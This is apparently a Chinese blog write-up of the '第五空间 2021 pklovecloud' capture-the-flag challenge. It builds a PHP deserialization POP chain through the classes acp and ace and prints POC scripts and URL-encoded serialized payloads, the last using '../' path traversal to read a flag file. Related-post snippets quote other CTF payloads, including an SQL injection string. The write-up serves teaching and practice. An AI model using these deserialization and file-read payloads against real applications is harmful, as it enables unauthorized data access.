[第五空间 2021]pklovecloud slackmoon的WriteUp

最新推荐文章于 2024-07-20 15:38:47 发布
最新推荐文章于 2024-07-20 15:38:47 发布
阅读量777 收藏 4
点赞数 5
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61155226/article/details/131040996
版权

 

        这道题,我认为有必要好好写一下WP,因为这道题的有一些点还是比较有趣的,我也是第一次见;师傅们放心观看WP,我保证讲的清清楚楚的(笑),下面正式开始讲解;

        首先这种反序列化的题目,需要先从获取Flag的函数开始一步一步的往前面做,在这道题中我们一来就发现了include 'flag.php';

        所以我们不难想到Flag可能就存放在flag.php文件中,那么我们继续往下面看代码,去找一下有没有危险的函数可以让我们读flag.php的内容;我们在Class ace中发现了file_get_contents()函数,这个函数的功能是将文件读取,因此我们只需要file_get_contents(flag.php)即可读取到flag;

 

        前面我们说了需要先从获取Flag的函数开始一步一步的往前面做,我们现在找到了获取Flag的函数,接下来我们需要去寻找如何才能调用Class ace中的file_get_contents()函数,即为去寻找如何才能调用Class ace中的echo_name()函数

        我们可以在Class acp类中的__toString()魔术方法中发现存在echo_name()函数的调用;

        接下来自然而然的是,继续往前面递推,去寻找什么能够调用Class acp中的__toString()魔术方法;那么我们需要知道__toString()魔术方法的相关知识;

在这里我进行一下总结:

  • 对一个对象进行echo操作或者print操作会触发__toString;

  • 声明的变量赋值为对象后与字符串做弱类型比较的时候就能触发__toString;

Eg. [NISACTF 2022]babyserialize

 

  • 声明的变量赋值为对象后进行正则匹配的时候就能触发__toString;

Eg. [NISACTF 2022]popchains

 

  • 声明的变量被赋值为对象后进行strolower的时候就能触发__toString;

Eg. [NISACTF 2022]popchains

        总结一下:其实__toString的触发方法就是:将对象当作字符串使用,我个人是这么理解的,如果有那里不对,还请师傅们指正;

         回到题目中来,我们会发现Class acp中的__construct()构造函数中对$cinder进行了实例化,而__construct()构造函数在实例化一个对象的时候就会被调用;       

        然后我们发现,程序接受了参数后会先进行反序列,然后echo 反序列后的对象;

 

 

        因此如果我们传入pks后,$logData会变成一个对象,然后又echo $logData,就会使得调用其对应的__toString()魔术方法;

       下面我们总结一下POP链的构造:

整体流程思路 :

Class ace ->   echo_name()

Class acp -> __toString()

Class acp -> __construct()

由于上面的思路是倒推出的,所以编写POC的时候,要反着编写;

我们先想办法触发Class acp->__construct(),在这里我们只需要编写下面的POC即可实现触发: 

<?php
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new pkshow();
    }

}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
}

//触发Class acp -> __construct()
$a = new acp();
echo urlencode(serialize($a));

 然后根据题目要求GET传参给pks即可

        我们可以发现这里输出了Pk very safe^.^,说明我们上面的POP链调用到了Class pkshow中的echo name(),是因为我们的POC中$a = new acp();,然后将$a序列化后传递给pks进行反序列化后赋值给$logData,$logData又被echo操作了;

        所以就会调用acp类中的__toString()魔法方法,即为调用了$this->cinder->echo_name()这段代码,而根据acp类的默认构造方法,$this->cinder = new pkshow;所以在这里调用到了Class pkshow中的echo name();

        而我们只需要修改Class acp里面的__construct()构造函数里面的内容为:

$cinder = new ace;即可控制程序调用Class ace中的echo name();

POC如下,传参后发现我们成功来到了Class ace中的echo_name()函数的位置:

<?php
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        //触发
        $this->cinder = new ace;
    }

}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
}

//触发Class acp -> __construct()
$a = new acp();
echo urlencode(serialize($a));

        接下来我们分析一下Class ace中的echo_name(),我们可以发现需要满足$this->$openstack->neutron === $this->openstack->nova

       然后在上面有$this->$openstack = unserialize($this->docker),因此只要我们使得$this->docker =null,然后让$this->filename=”flag.php”即可使得上面的判断成立,并且读取flag.php的内容;

<?php
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new ace;
    }

}
class ace
{

    public $filename="flag.php";
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}

//触发Class acp -> __construct() 
$a = new acp();

$b = new ace();
$b->docker=null;

echo urlencode(serialize($a));

传参:

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

然后查看源码:

得到提示:"flag in /nssctfasdasdflag";

然后我们再修改一下$this->filename= nssctfasdasdflag

<?php
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new ace;
    }

}
class ace
{

    public $filename="nssctfasdasdflag";
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}

//触发Class acp -> __construct()
$a = new acp();

$b = new ace();
$b->docker=null;

echo urlencode(serialize($a));

传参:

 O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22nssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

        发现失败了,没有得到Flag,提示keystone lost~;分析了很久!!!

        最开始以为是没有成功绕过,但是其实绕过是成功的!!!在这里之所以会输出keystone lost~,是因为我们读取的nssctfasdasdflag是不存在的;

 

        因此我们尝试读取上一级目录的nssctfasdasdflag,即:读取../nssctfasdasdflag,修改后POC如下:

 

<?php
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new ace;
    }

}
class ace
{

    public $filename="../nssctfasdasdflag";
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}

//触发Class acp -> __construct()
$a = new acp();

$b = new ace();
$b->docker=null;

echo urlencode(serialize($a));

 

传参:

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A19%3A%22..%2Fnssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

总结一下:第五空间的题目(快跑!!!!有毒)小细节真多

By:SlackMoon 2023.6.5 

 

SlackMoon
关注
[第五空间 2021]pklovecloud题解
qq_64222098的博客
05-07 268
在acp这个类里面,我们看到了_toString魔法方法,这个方法是当我们把一个对象当作函数调用时会被自动调用。并且_toString方法里还调用了echo_name()这个函数,这个函数恰巧就是我们先前找到的最终获得flag的地方。首先变量heat也是没有被赋值的,如果这时我们让变量nova的值也为空的话不久可以了嘛。这里我们就找到了这个链的终点,即我们可以通过这个file_get_contents函数来获得flag。知道了flag的位置了只需要把变量filename的值变一下就成功获得flag了。
StrangeLanguage WriteUp(第三届“第五空间”网络安全大赛reverse wp)
Drawlonely的博客
09-18 2113
StrangeLanguage WriteUp 题目给了main.exe,看大小和图标判断是使用pyinstaller将py文件打包成的可执行文件,简单运行,让你输入(猜测输入flag),然后会有提示"nonono" 提取py 使用工具PyInstaller Extractor可直接提出pyc,再使用Uncompyle6反编译就能得到main.py python .\pyinstxtractor.py main.exe cd .\main.exe_extracted\ uncompyle6 main.py
[第五空间 2021]pklovecloud
qq_73767109的博客
07-05 313
同一个类中的两个属性进行强比较,neutron有了赋值且赋值是$heat(整体没有出现)而nova又没有,这种情况下看着是无法相等的,但是这样可以利用null来进行比较,换句话说只要dokcer的类是null,哪无论怎么赋值结果都是null。而要利用到该函数就要大体上看如何构造pop链,可以看到是在rce类中的echo_name方法中,而唯一能调用这个方法的只有rcp类中的Tostring方法中,该方法。2.遇到受保护属性可以通过修改方法中的赋值来修改私有属性(很疑惑序列化后方法不是没了吗)
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3402
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
NSSCTF[第五空间 2021]pklovecloud_WP
最新发布
DoNotShyDoIt的博客
07-20 327
NSSCTF[第五空间 2021]pklovecloud_WP
2021强网杯Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网杯Writeup--by Nu1L Team.pdf”,“第五届‘强网杯’全国网络安全挑战赛”以及标签“CTF 网络安全 信息安全”。这些信息共同指向一个全国性的网络安全竞赛和Nu1L团队提交的...
GKCTF2021-官方WriteUp.pdf
07-06
【标题】:GKCTF2021-官方WriteUp.pdf 【描述】:GKCTF2021-官方WriteUp.pdf 【标签】:wp writeup 这些标题和描述表明,文件是一份关于GKCTF2021(一个网络安全竞赛,CTF代表Capture The Flag)的官方攻略...
2021CTF工业信息安全技能大赛(杭州站)
08-02
【标题】"2021CTF工业信息安全技能大赛(杭州站)" 描述了一次重要的信息安全竞赛活动,该活动在2021年于杭州举行,聚焦于工业信息安全领域。CTF,全称Capture The Flag,是信息安全领域的常见比赛形式,通常包含解谜...
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
PHP反序列化&POP链的构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 3076
网上关与PHP反序列化&POP链构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
[第五空间 2021]pklovecloud 解题思路&过程
iamblackcat's blog
08-06 681
[第五空间 2021]pklovecloud 解题思路&过程
第五空间PKlovecloud题解
m0_74925562的博客
01-04 406
this->filename一眼丁真反序列化打开代码编辑器,我们需要构造pop链,来连接入口和出口,题目中我们需要拿flag,可以看到危险函数file_get_contents(),我们可以进行文件读取,我们来研究一下如何读取这里就上面两个魔术方法我们看下这段代码输出一个$logData,当我们传入一个对象时就会触发_tostring(),所以我们一开始传入acp(),可以看到危险函数在函数echo_name里,而_tostring里刚好有这个函数,所以我们给$cinder。
php对象与反序列化浅记
我的数字盆栽
10-25 87
关于php反序列化的表层原理和4道例题的解答
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5896
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
CTF 反序列化入门例题wp
qq_47168481的博客
10-20 2700
最近有再看反序列化,尝试着学一下比赛中的反序列化: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
第三届第五空间网络安全大赛 Web复现
Sk1y的博客
09-24 1156
环境还没关,良心比赛方,赶紧趁着复现复现 文章目录pklovecloudPNG图片转换器EasyCleanupyet_another_mysql_injectionWebFTP pklovecloud 是个pop链,需要注意的地方是acp类型中的成员cinder是protected属性的,序列化之后会增加三个字符%00*%00(url编码之后) <?php include 'flag.php'; class pkshow { function echo_name()
CTF关于反序列化练习随笔记录
2301_80127209的博客
05-08 1003
destruct 析构方法,PHP将在对象被销毁前(即从内存中清除前)调用这个方法 默认情况下,PHP仅仅释放对象属性所占用的内存并销毁对象相关的资源.,析构函数允许你在使用一个对象之后执行任意代码来清除内存,当PHP决定你的脚本不再与对象相关时,析构函数将被调用.在一个函数的命名空间内,这会发生在函数return的时候,对于全局变量,这发生于脚本结束的时候,如果你想明确地销毁一个对象,你可以给指向该对象的变量分配任何其它值,通常将变量赋值勤为NULL或者调用unset。PHP5.3.0以上版本有效。
【无标题】
2301_79880442的博客
04-25 972
进行代码审计包含flag.php文件,有三个类:pkshow,echo_name这个函数acp,cinder这个保护属性,neutron,nova这两个公有属性;construct,tostring这两个魔术方法。ace,filename,openstack,docker这三个公有属性;echo_name这个函数。一个if语句。第一步找危险函数,找到ace下的echo_name函数,里面有当filename='flag.php'时就会输出flag,但它要通过前面的这个强比较,
"2021东华杯Web Writeup1:EzGadget反序列化漏洞分析
2021年东华杯Web Writeup1比赛中,EzGadget提供了源码并打开了IDEA进行分析。在源码中发现了一个反序列化的漏洞点:在ToStringBean这个类的unser方法中,通过"/readobject"接口接收data参数并进行反序列化操作。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值